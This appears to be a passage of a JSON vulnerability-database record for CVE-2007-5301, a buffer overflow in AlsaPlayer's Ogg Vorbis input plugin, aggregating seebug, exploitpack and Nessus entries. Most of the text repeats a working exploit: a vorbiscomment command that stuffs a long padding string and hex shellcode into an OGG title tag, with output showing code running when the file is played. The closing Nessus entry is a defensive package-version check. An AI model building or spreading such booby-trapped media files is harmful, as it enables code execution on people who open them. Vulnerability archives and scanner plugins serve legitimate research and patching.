AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\
x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8307"}, {"lastseen": "2017-11-19T13:53:01", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65318", "id": "SSV:65318", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print 
"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\
x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65318"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "description": "\nAlsaPlayer 0.99.80-rc3 - Vorbis Input Local Buffer Overflow", "edition": 1, "published": "2008-04-10T00:00:00", "title": "AlsaPlayer 0.99.80-rc3 - Vorbis Input Local Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "id": "EXPLOITPACK:EC45CE53D720F233296DC2F925C00A11", "href": "", "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\n\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\n\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\n\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print 
\"AAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\n\\x
bf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \n\nThen, if you plays the file with the vulnerable version:\n\nwhats@debian:~$ alsaplayer exploit.ogg\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\n\nThis was tested with the debian etch packages.\n\n- whats\n\n# milw0rm.com [2008-04-10]", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:44:59", "description": "Erik Sjolund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously crafted Vorbis file could lead to the execution of\narbitrary code.", "edition": 25, "published": "2008-04-11T00:00:00", "title": "Debian DSA-1538-1 : alsaplayer - buffer overrun", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:alsaplayer"], "id": "DEBIAN_DSA-1538.NASL", "href": "https://www.tenable.com/plugins/nessus/31808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1538. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31808);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-5301\");\n script_xref(name:\"DSA\", value:\"1538\");\n\n script_name(english:\"Debian DSA-1538-1 : alsaplayer - buffer overrun\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Erik Sjolund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously crafted Vorbis file could lead to the execution of\narbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1538\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the alsaplayer packages.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:alsaplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/11\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-alsa\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-common\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-daemon\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-esd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-gtk\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-jack\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-nas\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-oss\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-text\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-xosd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer-dev\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer0\", reference:\"0.99.76-9+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}